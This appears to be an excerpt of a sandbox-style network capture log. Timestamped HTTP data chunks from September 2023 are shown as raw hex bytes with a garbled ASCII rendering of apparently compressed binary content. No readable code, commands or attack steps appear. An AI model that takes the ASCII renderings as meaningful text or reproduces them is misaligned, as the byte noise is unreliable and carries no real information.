                                                                                                                      2023-09-07 16:19:24 UTC390INData Raw: d4 9e 77 b9 5c 3e 63 1d 75 a1 24 f3 cb 64 2b cd d3 c5 9d da f3 be b3 1a cd e8 26 96 a9 36 7e 67 31 be d5 ef e8 c9 c8 aa cb ed 79 9f a4 cc 53 27 97 cc cf 74 a8 50 cc 73 ff d6 d5 03 85 5d 3c 90 db 79 b9 74 a5 59 f2 79 17 76 78 b4 f6 81 0e b5 ca a3 f4 aa f3 ce ae 1e a5 b5 23 94 5a 77 5c 5e 52 09 2c dc ad 8f 4b 6a f7 d3 e8 ab 92 55 ef d6 92 ba 61 f2 3d e8 f7 b8 6f 47 40 23 87 d7 5a 6f 27 eb f8 56 f1 72 17 90 e3 09 d4 05 e4 8a e4 ac 7a 36 1a af 04 c9 a2 57 e5 8d 11 2e 14 d4 fb 12 68 e0 14 b6 97 c3 45 5c 72 05 3b d0 b1 87 6e 45 62 55 4a c2 f7 44 e3 1d 69 96 7c 47 7a db cb 2d f2 1d e9 e8 97 5b 02 77 a4 75 6e ad 9d 5c f3 8a 7a 47 7a 02 b3 b7 24 68 a4 c4 fc 11 40 f8 ea 9c e4 9f af ca da 77 63 c9 2c 4c 28 40 7e 7d 89 d2 82 54 85 16 5c 85 b4 e0 0a 4a 0b e8 03 4b 03
                                                                                                                      Data Ascii: w\>cu$d+&6~g1yS'tPs]<ytYyvx#Zw\^R,KjUa=oG@#Zo'Vrz6W.hE\r;nEbUJDi|Gz-[wun\zGz$h@wc,L(@~}T\JK
                                                                                                                      2023-09-07 16:19:24 UTC398INData Raw: 50 f4 ff 11 f7 ed 71 51 56 f9 ff 73 63 78 14 e4 19 60 04 4c 05 4c d3 cc cc cb 58 01 a3 26 ca 80 5d 46 07 09 d0 5c a4 b6 8d 5a ba 7c 0b 9f 47 dc 2d 0c 1b a8 b9 ec ec f7 57 5b bb df da ed db 5e da ad b6 b6 be db 16 d6 b6 15 48 0b a2 56 6a 17 75 49 a5 72 f3 e0 43 3a 26 e1 8c 8e 3c df cf e7 3c 97 99 67 18 cc be db be 7e 7f 88 f0 9c fb f9 dc de e7 73 ce f9 9c 17 64 4c 53 2c eb 64 a1 20 1e e1 cc 40 3b 14 57 b6 37 36 13 18 66 54 de 23 b0 5c f2 6d 37 de fc ea 46 c1 a0 8e 32 2f 6e 94 56 10 08 dc 42 b7 1f e2 32 0b 9b 2c 7c b2 ad bd 7f 09 d0 73 43 12 7d 19 13 af df d9 4f e1 fb 5f a5 2a 8e db f5 a5 5e d7 cf 50 90 60 0d 38 07 88 db 81 50 6e c0 7e 88 6d 41 29 2a dc 68 e5 67 f9 bb 31 e6 cc 83 04 d9 a1 2d 75 6e 9d 37 a5 79 e1 5c 9d 74 ee 75 89 bb d3 60 77 58 58 f7 76 ea
                                                                                                                      Data Ascii: PqQVscx`LLX&]F\Z|G-W[^HVjuIrC:&<<g~sdLS,d @;W76fT#\m7F2/nVB2,|sC}O_*^P`8Pn~mA)*hg1-un7y\tu`wXXv
                                                                                                                      2023-09-07 16:19:24 UTC406INData Raw: de 0b 09 d1 d7 7c b0 06 a2 d3 02 72 b0 6c a8 a4 00 84 78 11 ed 6d 3e 40 2b 5b 8f f4 65 4d 9c 93 78 dd 5a 00 4e 3e 63 22 44 b6 4c 45 64 45 50 30 5f 19 b8 90 e5 cb 82 46 5a f6 70 27 47 40 33 0b be 29 fc 24 7d 28 e7 17 74 8d 14 03 c9 1e 53 c4 e1 27 23 28 f0 6b 0d 05 a2 db fd 67 0c 30 85 4d 8c ce 5f 99 ca 5f d4 ba 87 9b 42 de 34 aa 73 30 f1 79 7d fc be 31 10 d7 c1 e0 7b bc 55 3e e6 9a 16 7c 53 97 1f a4 0a 0d 11 88 59 d2 65 4b 20 dd 28 1c 5a be 6e 56 5c 98 b0 78 1d 76 77 a2 e8 21 16 8a fc 31 a4 c6 ab 34 70 08 c3 5f 40 66 46 fb f4 d0 1f f5 3a 09 51 fc 5c 7e 75 fd d3 ea b7 f1 6f fb a9 0d 19 44 17 cd b8 0e 32 0a 37 c9 0c 64 35 9c 16 65 c3 64 95 7d 57 d8 81 cf 53 f4 34 ea 4c 31 68 31 fc 56 15 8f 18 97 d6 28 76 69 22 79 da a0 d4 ad 0d 06 27 b0 71 56 2a b1 0c e4 88
                                                                                                                      Data Ascii: |rlxm>@+[eMxZN>c"DLEdEP0_FZp'G@3)$}(tS'#(kg0M__B4s0y}1{U>|SYeK (ZnV\xvw!14p_@fF:Q\~uoD27d5ed}WS4L1h1V(vi"y'qV*
                                                                                                                      2023-09-07 16:19:24 UTC414INData Raw: 0f eb 4e f3 54 07 03 ef 03 34 8a e6 47 e8 09 2f 30 34 3f be 58 a6 62 9c 11 c7 49 b9 08 e7 53 3a 34 b3 8a 4f 10 ce 9f 42 7d 00 16 26 f5 2f b1 5d b9 56 b2 50 6c 88 21 42 1d 27 f4 22 17 f5 a8 26 68 72 10 5a 21 35 09 c3 97 d9 92 89 d6 b3 1e 74 39 bf f4 65 3b e5 dd e7 a4 9c 06 09 94 24 fc 26 f4 19 cc 54 62 9b ad fc e6 24 1a 01 4a 16 60 81 89 9e b9 50 64 6e ef 64 15 3e 09 2b 57 80 6a a2 06 6c 36 36 08 c9 43 18 81 ab 8a c9 8a b4 9c db cd 95 2c 98 57 9c f9 57 22 fa b5 f8 e4 e8 7d b1 dc ee c3 f2 51 7f 20 01 c7 ea b1 b5 a3 e5 da 14 f8 85 39 b7 fb 23 bf 84 6b db 5b 0c f1 43 c4 b1 c3 3d 20 35 47 0b e0 da 4c 14 25 7c cb 6a 12 20 8f d3 8e 87 fa a2 7d 07 0c 09 f2 51 48 bc 2c 15 74 aa 05 54 a7 5a 4c da 5e 2c 4e 22 3d e2 88 d5 57 51 ba da ab bf 84 99 c7 1c fd 57 51 49 22
                                                                                                                      Data Ascii: NT4G/04?XbIS:4OB}&/]VPl!B'"&hrZ!5t9e;$&Tb$J`Pdnd>+Wjl66C,WW"}Q 9#k[C= 5GL%|j }QH,tTZL^,N"=WQWQI"
                                                                                                                      2023-09-07 16:19:24 UTC422INData Raw: 5e 9d f2 5a a7 2e 43 d9 b4 0a aa f4 b7 84 4d a5 7f 0b e8 37 0e b9 c0 29 d6 b9 d5 bd a0 f4 f7 23 b3 c9 52 61 11 15 4d d4 fc e6 64 e0 35 68 7b 70 7e 18 c5 0e 54 ff 0d 3f a6 22 f8 70 03 28 fd 73 94 4f ee 6f d5 64 1c 03 64 3e 3e 48 19 9d c4 3a 02 05 46 3e 13 ea d5 20 e9 af 43 8f 10 95 ff 49 78 90 43 54 fe ad 66 ff 6b c1 67 c3 2c 04 f5 ac 21 29 24 f5 4b cc 02 6f cc 26 62 c9 43 08 6a 4b d8 1a 82 3a 98 0d 3b 81 63 25 cd 56 da 4b 40 a1 2f 26 8a 43 98 6a fb 9a e5 61 c1 0a d4 f6 27 a2 b6 8f 9c 27 2d c9 a5 23 75 36 0b 42 3d 1b d6 83 50 6b c2 86 b6 bf b1 1d c5 db 0c 42 dd 85 da 7e 4d 58 d7 f6 2d 3d 6b 06 a1 c2 8f fe fc d2 51 68 31 66 15 6b 66 92 fb e3 c6 ba ab 2e b4 a8 fb f0 c9 52 b1 8e a9 fb c8 01 a6 ee e7 a0 ba 9f 83 ea 7e 8e 55 dd 37 32 5d 2a 1d 07 75 5f aa b1 a8
                                                                                                                      Data Ascii: ^Z.CM7)#RaMd5h{p~T?"p(sOodd>>H:F> CIxCTfkg,!)$Ko&bCjK:;c%VK@/&Cja''-#u6B=PkB~MX-=kQh1fkf.R~U72]*u_
                                                                                                                      2023-09-07 16:19:24 UTC429INData Raw: e9 d0 da 8e f6 9b 44 02 d1 fc 33 bb 90 72 e5 e9 6c be ea af f7 b5 20 ff cc f6 71 f2 7b bb 99 df fb fa a3 f3 9b 69 61 a2 59 64 ac 21 72 65 b9 2b 37 6a 42 62 5e 18 13 4d cb 2e 81 89 06 b0 cd 8d 5c c7 78 bd bd dc 4c ff 93 60 74 fa d7 8b e4 43 65 c9 e0 2f 6e 0f cb cc da 95 bb 92 4d 6a 08 0d 7c c3 c6 20 b0 69 14 08 6c 10 04 df f0 25 db 78 2f 31 76 87 fd 95 1b 51 9a 2f ac 02 8b 45 2d f7 57 76 a0 bf f2 17 dc 62 b1 8e fb 2b 0f 52 8b 05 1d 44 c1 6a b1 08 ad 16 79 e8 af 4c 49 5f 3a d5 6a 4e 61 f3 c1 8f 9c dc 5b 19 9e 95 18 e9 76 ea ae fc 62 6c 06 9b d5 a6 90 8e f6 85 85 b4 6c 1f 08 49 99 cb 19 0e 32 24 35 37 89 8b a8 01 d9 70 f6 52 97 44 e3 ec 68 98 7f 22 57 3f 54 4f 2d 22 db fa 38 48 3f b5 88 b8 c3 5c 36 a8 0e 25 75 e2 ec 88 16 91 ba 24 ec 0b 26 a5 4d 35 a3 b4 31
                                                                                                                      Data Ascii: D3rl q{iaYd!re+7jBb^M.\xL`tCe/nMj| il%x/1vQ/E-Wvb+RDjyLI_:jNa[vbllI2$57pRDh"W?TO-"8H?\6%u$&M51
                                                                                                                      2023-09-07 16:19:24 UTC437INData Raw: 46 ba 63 9e be ab fb 42 f5 fe f4 ba e1 d9 f2 20 69 88 a7 7e 43 a4 70 5e b7 f6 6b 29 5a bc 79 c1 66 f3 e6 c1 75 c3 17 d4 19 33 ad 4d e5 e9 fe 0e eb 8d e5 13 16 78 9d 3a d0 3b 46 28 25 a5 b1 50 16 fa a4 2e 7e cc 02 a1 4f e6 7d c0 70 ba e8 89 3a 7f 84 38 24 38 27 e7 e6 b1 fb ea e9 51 36 e9 23 e9 bc 10 28 60 1f fb 27 75 fc fa 6b 7a 48 f0 36 f6 b1 7a ba cf f6 18 3d 2a 60 60 6b 79 7a 9c 7f 10 5b fb 20 fd 91 c8 b9 05 92 c4 d9 72 b8 71 02 89 62 3d e5 b8 29 9b 6d c4 53 3b 8a eb d8 11 ec 6f de 87 aa 7c 34 e6 7e 85 d9 d3 c5 d6 cd c2 84 be 58 f6 b1 69 f8 2e df 2c 2d de 59 ea 8b c7 93 cf 15 89 98 3e 96 a6 47 b1 8f 0d 0f a6 27 f9 3a f1 77 74 13 33 5e 8e 96 63 7d df d1 da 8c 98 fb 7b 04 b4 6f 04 fb 18 41 53 7d d3 d3 6e 53 41 77 8f b4 1f d8 32 22 77 89 74 d8 97 4b 5d cf
                                                                                                                      Data Ascii: FcB i~Cp^k)Zyfu3Mx:;F(%P.~O}p:8$8'Q6#(`'ukzH6z=*``kyz[ rqb=)mS;o|4~Xi.,-Y>G':wt3^c}{oAS}nSAw2"wtK]
                                                                                                                      2023-09-07 16:19:24 UTC445INData Raw: cb 16 40 a2 64 1b a4 3e dc 21 50 89 33 22 58 e4 dc 09 a5 08 eb 11 d1 ba a1 10 68 fb 45 95 40 95 50 5c 69 6e ed 0a 54 aa b9 fb ba e6 01 fe f1 42 55 27 8c 47 c4 9f 33 e0 ea 6f 87 ce 3f 4a 5a 98 28 dd 06 34 a8 91 32 e3 b7 ab ef 1b 48 44 d7 d1 54 1d 2d 3a a9 b6 9e 9b 80 0d cc 33 92 79 f4 c8 c4 59 a6 80 8b b4 d8 08 7f 33 62 6e 23 fe 41 50 63 24 82 dd 2e db 02 96 c2 00 fb 30 7a 03 a1 a5 a3 95 de 66 51 a3 c1 87 36 bc 01 a3 52 d5 9d 5a 3a dd 09 ec bd f6 35 7a 79 db d3 45 d9 fb d5 d7 54 f6 96 8e 90 06 5c 45 1c 45 73 53 14 88 80 34 de 94 f6 83 94 63 96 6e 33 74 35 e8 f8 55 d8 1b 95 26 29 d3 28 da 70 51 c7 9f b1 f2 c6 f2 c5 52 d2 1e 49 af 50 78 78 90 5c 07 8e ab 76 4a 7d b6 ff 54 b6 c8 b7 62 d6 07 24 c3 1e 60 16 03 7f 8f 84 cb 84 7e 5d f2 7b b5 00 7f 5c 6a f4 83 aa
                                                                                                                      Data Ascii: @d>!P3"XhE@P\inTBU'G3o?JZ(42HDT-:3yY3bn#APc$.0zfQ6RZ:5zyET\EEsS4cn3t5U&)(pQRIPxx\vJ}Tb$`~]{\j
                                                                                                                      2023-09-07 16:19:24 UTC453INData Raw: 66 3c 55 97 a6 31 45 cc 18 86 a9 ba 99 b9 86 aa 4b d3 69 d4 4b 66 a3 85 9e 54 61 aa d3 99 89 f8 5d 33 99 59 c6 8c 65 98 87 67 32 69 f8 2c 18 19 23 b3 91 61 06 c3 d4 c0 32 8f 33 ec 43 4c 2e 33 84 61 cc 6b 19 17 33 82 61 86 14 33 36 dc b3 1b 5a c6 2c 62 86 32 cc 30 8e 59 cc c4 c3 b2 67 1d 53 c0 8c 64 98 04 9e c9 67 80 cd 86 df cf dc 86 d3 cb 88 d5 cc 42 a8 88 49 5c c3 38 50 d5 1f 79 17 f3 6b c4 e3 aa 42 a6 8a 19 0d 68 a9 54 4d d2 f0 5c ce 64 21 43 8c 29 67 f2 98 61 0c 33 76 05 33 17 77 19 93 4b 98 6c dc 24 bc fa 3e 66 1e 6e 3e 8e 2b 65 72 f0 ec 43 8a 9b b9 1d cb a7 3e c0 dc c1 c4 32 cc f8 07 99 f9 78 c8 e8 1a 2b 73 0b 56 77 ed b5 d4 51 33 33 e1 6e 66 03 7e 4f d4 da 59 ca ac a7 8d fe 8a b9 93 b9 8a 61 26 55 32 4b 70 dc 4d be 97 99 83 bb 96 d7 57 30 4e 9c 74
                                                                                                                      Data Ascii: f<U1EKiKfTa]3Yeg2i,#a23CL.3ak3a36Z,b20YgSdgBI\8PykBhTM\d!C)ga3v3wKl$>fn>+erC>2x+sVwQ33nf~OYa&U2KpMW0Nt
                                                                                                                      2023-09-07 16:19:24 UTC461INData Raw: e1 91 59 1a 67 6c 95 77 9d a4 06 75 15 ea 25 5a cb fc 26 79 ea 2b e1 c8 de 2a 04 91 2d 05 e8 4b c9 a1 30 64 af 0e 25 de 81 3e f5 48 02 05 cf 58 e0 02 f8 d8 4d 7f a3 3b 10 f0 aa 60 f3 fc 68 59 f4 1c 44 11 41 41 41 21 50 dd b3 94 1b eb 5d 1c 2d 57 f7 dc c0 0d b7 d0 f7 e5 83 65 fa 7d fb e6 18 48 e6 ff 93 46 9f 44 cf 7b 88 5b 20 85 dd 64 c3 1b de 6f e3 cb 21 ac 30 15 1e dc 37 2e 51 32 39 5c 41 b0 32 67 f4 29 83 0c 3a 08 27 31 85 1a 5a ea 83 0f 07 81 7e 12 dd 99 d3 ca f5 cd 8e 60 86 3b 42 19 78 5a bc 1f 41 26 87 52 5d 90 5a da 16 4e 10 73 28 f1 96 3e 8d be ee 18 07 e9 5d 8e 21 7d 8f 40 67 28 ef 40 43 c1 37 de da 48 fa 84 93 c9 c8 b7 03 1a d4 7d c8 28 fd 99 6e 77 4d b0 66 7c 53 7a 34 bc d9 a7 43 89 e8 7a 50 56 f8 bf 0e 5a 90 02 5a 7b bf 82 27 6f 6d 34 1e 44 2f
                                                                                                                      Data Ascii: Yglwu%Z&y+*-K0d%>HXM;`hYDAAA!P]-We}HFD{[ do!07.Q29\A2g):'1Z~`;BxZA&R]ZNs(>]!}@g(@C7H}(nwMf|Sz4CzPVZZ{'om4D/
                                                                                                                      2023-09-07 16:19:24 UTC469INData Raw: 00 91 bd 57 5c 6b 28 11 e7 19 d1 9a 39 82 ea 60 f5 31 01 b9 65 80 40 5f 52 7e 22 1e 24 57 62 f6 ba 16 65 1c 5f b4 68 91 cc c7 e7 22 37 3a 48 22 3a 09 0c c0 4f 58 75 7e 49 05 f3 04 0c 17 a1 17 de 8f c0 83 77 cd b4 ea e2 50 d5 b9 92 dd 04 c3 24 2a 4f 6a 6d f0 1b c6 53 2a bd 21 47 83 fe fd 31 28 4f 26 29 cb 20 0d 62 f7 5c a0 28 8c 87 89 87 41 8e 90 b9 61 d6 f3 9c b1 a6 11 a3 d8 f9 27 bc 83 28 f9 53 33 8e 5b f7 f3 43 ad 87 f8 c1 18 cb 01 3d e7 39 0c a2 d9 3f bb a6 51 07 d9 c4 fc 5e a8 47 3a d6 f0 4d 42 43 5b 6c ec d1 d8 7c 54 d4 1a 3e 8f f5 0f 93 8c d2 47 0d fe b1 fa e3 b1 27 f4 2d 35 cd d8 c3 54 ce 78 4e 71 e8 73 2c f6 fd 65 45 25 68 b3 0c 52 23 3d 5c d9 8b c7 e3 40 4e d1 76 c6 e5 b5 19 69 98 56 32 0e 17 77 05 e8 56 de cd b8 87 08 67 4d 5e fe a8 d4 fb d2 4b
                                                                                                                      Data Ascii: W\k(9`1e@_R~"$Wbe_h"7:H":OXu~IwP$*OjmS*!G1(O&) b\(Aa'(S3[C=9?Q^G:MBC[l|T>G'-5TxNqs,eE%hR#=\@NviV2wVgM^K
                                                                                                                      2023-09-07 16:19:24 UTC476INData Raw: 77 67 9c 96 61 61 07 0b 96 0d 35 4a 87 65 17 db 54 df 98 8b b3 b0 89 cc f6 33 b7 d2 61 da 5b 0f 9b 62 36 2a cf d1 c6 51 f2 85 e9 b0 ed 8b 59 72 4e 2e 6a 2f 0f b7 8e f0 53 ce 00 95 6d 9f a5 5e ef 94 60 61 d7 89 45 66 66 19 20 3f ad 67 e4 30 0b 32 bd f1 22 13 1e 66 c0 75 bd 75 fb 0d 99 c8 bf f1 a9 87 58 75 06 ac 7d 6b af ec d7 1c 82 63 aa e9 e7 f8 1a 99 50 5e 3c fc cd 11 53 d4 3e 79 45 0a 1d fb 32 c1 aa d4 74 c8 17 ad c1 2c ec c9 31 1f 39 bf 4c 38 a9 1f 38 f1 96 33 ea 7f cb 6d 2f cc 6f cd 84 bd df 87 5e c3 8f 4b b3 30 1d 1f fc bc 5e 16 dc 14 cd 8d fa b8 03 a5 37 32 8b d1 60 97 05 b5 e3 b6 0d 3f 5b 88 dc 39 3d 7b b6 87 65 81 af fa a5 8d ed b3 24 59 58 b9 9c 5f 6b 6f 16 ec 5b 2b 9b b9 e8 42 14 aa af 19 0b 6e cf cf 86 18 ef 41 45 2f b7 a2 f9 8e de d3 4b 1b 4e
                                                                                                                      Data Ascii: wgaa5JeT3a[b6*QYrN.j/Sm^`aEff ?g02"fuuXu}kcP^<S>yE2t,19L883m/o^K0^72`?[9={e$YX_ko[+BnAE/KN
                                                                                                                      2023-09-07 16:19:24 UTC484INData Raw: 6e bd e0 99 e4 fe 46 47 85 f4 f6 fe 14 99 92 48 67 f6 eb 9f 99 25 59 bc 02 66 2d 99 57 d9 ee 36 4a 11 99 1b c1 30 94 e1 90 c5 37 64 19 50 b9 20 73 27 ab ce 15 3c 77 92 14 e1 3f d8 c1 24 0f 36 e2 0f 02 f0 5f f8 be 9c 43 02 be 2f 43 83 65 45 45 f1 9b f6 fb 77 7c 5f 94 84 a6 a0 f0 02 ba 2f 67 cf 6f ba 2f 49 2e 2e 95 a6 48 bf 9b 28 d2 af 05 a3 99 87 c4 cd 43 e2 96 4d a6 89 bf 9b c8 b2 93 ac d6 24 01 b3 75 53 03 c3 28 26 ca b5 07 3b 61 46 d2 54 b1 81 e8 91 71 fe 8d c8 6f 41 20 4c 47 28 23 48 56 16 65 c7 54 f1 bc e0 b9 01 3d ab 7b 08 9e f3 7e b3 7f 4d 85 64 ec 0a 01 eb d7 24 5a c0 b3 a6 6e d3 64 5c f8 89 fd 19 f9 9f c2 8d 89 13 21 b9 ce b6 94 1a ee 0b c6 30 54 36 13 44 1e f7 0f 22 e6 91 e2 15 88 59 16 c9 cb 14 c9 49 36 9b a6 ee 96 0a 88 de 26 8d 82 42 9b 2a 9e
                                                                                                                      Data Ascii: nFGHg%Yf-W6J07dP s'<w?$6_C/CeEEw|_/go/I..H(CM$uS(&;aFTqoA LG(#HVeT={~Md$Znd\!0T6D"YI6&B*
                                                                                                                      2023-09-07 16:19:24 UTC492INData Raw: 89 a3 83 45 a8 8b ac 1d 23 90 05 2a 38 63 1e 4a e7 00 c9 3e 4e 20 c9 b5 8a 1c 41 ec ca 0b 10 a2 54 91 b0 8e 8e a4 f3 6d 2c a0 4f 33 8c d2 18 46 51 6d a4 b2 f3 37 73 57 40 d8 b5 c9 26 59 c8 51 fd f5 9b 42 bd a6 50 9f 29 d4 63 0a f5 97 42 bd a5 50 5f 29 d4 53 0a f5 93 42 bd a4 50 1f 29 d4 43 0a f5 8f 42 bd a3 50 df 28 d4 33 0a f5 8b 42 bd a2 50 9f 28 d4 23 0a f5 87 42 bd a1 50 5f 28 d4 13 0a f5 83 42 bd a0 50 1f 28 d4 03 0a f5 7f 42 bd 9f 50 df 27 d4 f3 09 f5 7b 42 bd 9e 50 9f 27 d4 e3 09 f5 77 42 bd 9d 50 5f 27 d4 d3 09 f5 73 42 bd 9c 50 1f 27 d4 c3 09 f5 6f 42 bd 9b 50 df 26 d4 b3 09 f5 6b 42 bd 9a 50 9f 26 d4 a3 09 f5 67 42 bd 99 50 5f 26 d4 93 09 f5 63 42 bd 98 50 1f 26 d4 83 09 f5 5f 42 bd 97 50 df 25 d4 73 09 f5 5b 42 bd 96 50 9f 25 d4 63 09 f5 57 42
                                                                                                                      Data Ascii: E#*8cJ>N ATm,O3FQm7sW@&YQBP)cBP_)SBP)CBP(3BP(#BP_(BP(BP'{BP'wBP_'sBP'oBP&kBP&gBP_&cBP&_BP%s[BP%cWB
                                                                                                                      2023-09-07 16:19:24 UTC500INData Raw: 24 c6 3b bf e7 f8 56 bc 21 8c fc e3 cd 0c 3f 07 10 35 03 76 26 5b e4 fb 13 2f 9a 6f 66 3e f1 f3 23 0c fd c8 f4 5e 11 f6 ea 63 ee aa be 7f 41 64 c8 f1 5f dc 8c 78 46 94 ac d9 aa 60 95 e6 4b 04 dc 70 dc 77 a3 e2 31 31 46 92 9a 07 13 af a3 e2 df 3a 0f 7b 40 9c 62 56 cf 1d 37 c3 87 38 19 93 97 7c 29 d0 8b c8 7a 6a ae 1c 35 c0 93 98 1a 3e 50 ed a3 e9 75 e2 48 f9 02 b3 cd c1 97 89 72 43 bb 99 92 ac f3 84 fd 21 93 38 b5 11 27 89 29 8d 55 e4 fc 9c 98 b3 f5 78 ee be 9a 7d 7f 69 07 43 aa 26 28 1e 4f 2a 84 a7 f9 03 a4 44 b7 14 c2 39 8f 73 ba 45 6d 05 c0 9d 71 ec 62 e9 f9 02 30 bd a3 66 d0 a0 51 00 97 ba 7f 46 7c 8e cb 87 8c 99 be a3 ae ef c9 07 6e a9 e6 c6 76 99 7c 70 14 83 69 25 41 79 b0 ef 47 5d ea ec 2d 79 60 12 10 57 db 28 95 07 0f c2 16 39 95 be cf 85 9c c2 fa
                                                                                                                      Data Ascii: $;V!?5v&[/of>#^cAd_xF`Kpw11F:{@bV78|)zj5>PuHrC!8')Ux}iC&(O*D9sEmqb0fQF|nv|pi%AyG]-y`W(9
                                                                                                                      2023-09-07 16:19:24 UTC508INData Raw: 1a 1d ee 2a ed 4e 23 e7 0a ed 7e 99 76 f7 a0 dd 69 e4 5e a2 ed 2f d2 f6 34 72 2e d0 ee e7 69 77 77 da 9d 46 ce 39 da fd 2c 6d 4f 23 e7 0c 6d 7f 9a 0e 77 8a 76 a7 91 73 92 76 77 a3 dd 5d 69 77 1a b9 2e b4 bd 33 6d 4f 23 87 4b bb 3b d1 ee 8e b4 3b 8d 9c 13 b4 bd 03 6d 4f 23 e7 38 1d ce 9e 76 3f 46 bb d3 c8 b1 a3 dd 8f d2 ee 47 68 7b 1a b9 b6 b4 bd 0d 1d 8e 46 8e 35 ed 7e 98 76 3f 44 bb d3 c8 b1 a2 ed 0f d2 f6 34 72 0e d0 e1 f6 d3 ee 96 b4 3b 8d 9c 7d b4 fb 5e da 9e 46 ce 1e da 7e 37 1d 6e 17 ed 4e 23 c7 82 76 df 49 bb ef a0 dd 69 e4 6e a7 ed cd 69 7b 1a 39 db 68 77 33 da 7d 2b ed 4e 23 67 0b ed be 99 b6 a7 91 b3 89 b6 df 48 87 db 40 bb d3 c8 31 a5 dd 4d 68 77 63 da 9d 46 ae 11 6d bf 9e b6 a7 91 63 48 bb af a3 dd d7 d2 ee 34 72 d6 d0 f6 06 b4 3d 8d 9c d5 74
                                                                                                                      Data Ascii: *N#~vi^/4r.iwwF9,mO#mwvsvw]iw.3mO#K;;mO#8v?FGh{F5~v?D4r;}^F~7nN#vIini{9hw3}+N#gH@1MhwcFmcH4r=t
                                                                                                                      2023-09-07 16:19:24 UTC515INData Raw: 3d 14 fc bd af a1 4e dc c5 ae 78 6f 5e d8 55 fe 3a 9f 42 ee 61 1b 72 a5 4f 9f fe 1c 12 d0 aa 43 df 56 0c 20 d7 0c e9 20 21 94 22 34 54 16 45 6e dc 51 40 0e a1 38 6c 3f 07 7b b4 0c b0 e1 f4 05 8a 13 ea 07 5a 5f 18 be e8 83 d7 fd c1 dc 26 f4 1c 00 5e f3 73 1e df cc 41 93 9b 46 f4 38 71 7c e5 5b 51 39 3a 69 94 e7 4b 7b b5 2d e4 67 b5 11 f2 3a 8e e4 4a e0 0a 90 0f 28 f1 b2 c0 f6 6b 06 70 fa 4d b6 a4 ee 8a 3f 95 2b 7b 82 29 71 61 ee 81 04 c2 b9 dc 35 69 17 dd b7 8a 72 63 91 73 97 67 f2 15 d2 2e ec cc 2e 32 a4 9b d5 a7 98 98 6a f2 57 4a 0f 98 3b b7 4d df 43 0b b5 fc bb fa d8 e6 c5 4e dd bd 32 85 f0 17 31 8e 22 eb 1f 3e d6 f2 ef f0 93 f3 75 6d e7 4e 37 85 4f ea fc c5 c7 0f ed be d5 f2 ef f6 63 f8 8e d4 cb 6a 53 f8 85 2d b3 57 7d bd ec 17 2d ff ce 3f c1 ff d7 5b
                                                                                                                      Data Ascii: =Nxo^U:BarOCV !"4TEnQ@8l?{Z_&^sAF8q|[Q9:iK{-g:J(kpM?+{)qa5ircsg..2jWJ;MCN21">umN7OcjS-W}-?[
                                                                                                                      2023-09-07 16:19:24 UTC523INData Raw: a9 b8 c4 dc 16 5f 7a 8c 5e 52 bb eb 76 97 d8 80 35 cc ed 62 bb 4b 9a 89 6b d8 f3 39 7a 31 73 5b c6 5e 03 04 76 67 c0 81 36 99 dd 19 37 23 7b 6d a4 eb f5 9c 3b 12 e6 be d4 ee 9a e4 f2 25 bd dd 19 76 e2 3a e6 4e b1 dd 99 b5 13 d7 68 02 d6 95 1f 13 a9 6c cb 73 44 2a 29 7b c1 20 76 cb 63 d5 c9 6e e7 5d 2f b8 3d 29 3f 26 56 35 2b 57 ae 13 0b 21 92 3c b7 f3 50 04 0c 91 92 10 a9 10 02 84 c4 20 29 06 c9 48 90 ac 2e 48 82 41 32 0c 52 90 20 45 5d 90 14 83 14 6e 4f 34 ea e4 43 19 51 e9 f1 43 45 ea d6 e5 ca 64 85 5a c1 1c c5 96 a0 96 db 30 bb 89 85 c9 91 26 56 e5 42 94 65 37 59 d2 82 ec 16 6c 6e 94 9f f6 4c 71 47 a6 52 a6 6e c6 3e cd 79 24 63 ee db 18 c4 6c 29 06 b4 30 05 54 e7 3c 96 31 0f 30 a0 32 47 df 9a b9 dd 11 46 5c b5 43 ce 43 19 73 c7 46 43 10 19 ac 35 84 7f
                                                                                                                      Data Ascii: _z^Rv5bKk9z1s[^vg67#{m;%v:NhlsD*){ vcn]/=)?&V5+W!<P )H.HA2R E]nO4CQCEdZ0&VBe7YlnLqGRn>y$cl)0T<102GF\CCsFC5
                                                                                                                      2023-09-07 16:19:24 UTC531INData Raw: c2 75 25 07 7e 88 95 dd b2 00 d5 a8 8e 53 5c af b1 29 14 59 5e 2f b6 3b a6 21 56 36 15 a5 1d 34 aa 3c f9 0c 51 78 62 f9 5a 65 7f cd 54 ca e4 ab f1 fb 68 f9 c1 84 ab df e2 ea 6b 4a 2e 18 6c f2 d1 08 22 36 4a c9 38 50 46 06 bf bf 90 47 cc 03 f4 37 89 cf cb 3a 1f 70 cc 24 0e 4c a1 27 7a f9 3a 2e 38 95 04 af e3 82 53 cb 6a 85 e6 8b 51 35 e7 2c b1 f2 94 75 64 f7 44 24 4f 61 30 61 ea c6 ba 74 a9 9b 4d c9 d8 5c b7 54 ec 56 ae e7 0d 21 ec ba a3 75 c8 39 34 23 54 b6 9c 45 a9 f6 66 39 65 a6 85 bf fa 6d 36 f5 53 53 44 43 26 87 db 50 ca a6 46 9b 7c 11 2f 92 10 e7 82 39 3c dd 52 5c e0 7f 79 0a 66 27 52 39 d4 e5 ec 96 83 db 16 b5 9a 14 97 fa d4 3d f2 2a ea da 71 d4 2d e1 a8 5b cc 51 97 d4 2d 45 41 44 a2 23 ee 35 92 ad bb 7a 01 fa cb 1c 75 eb 7c c0 41 e8 90 82 29 f4 bf
                                                                                                                      Data Ascii: u%~S\)Y^/;!V64<QxbZeThkJ.l"6J8PFG7:p$L'z:.8SjQ5,udD$Oa0atM\TV!u94#TEf9em6SSDC&PF|/9<R\yf'R9=*q-[Q-EAD#5zu|A)
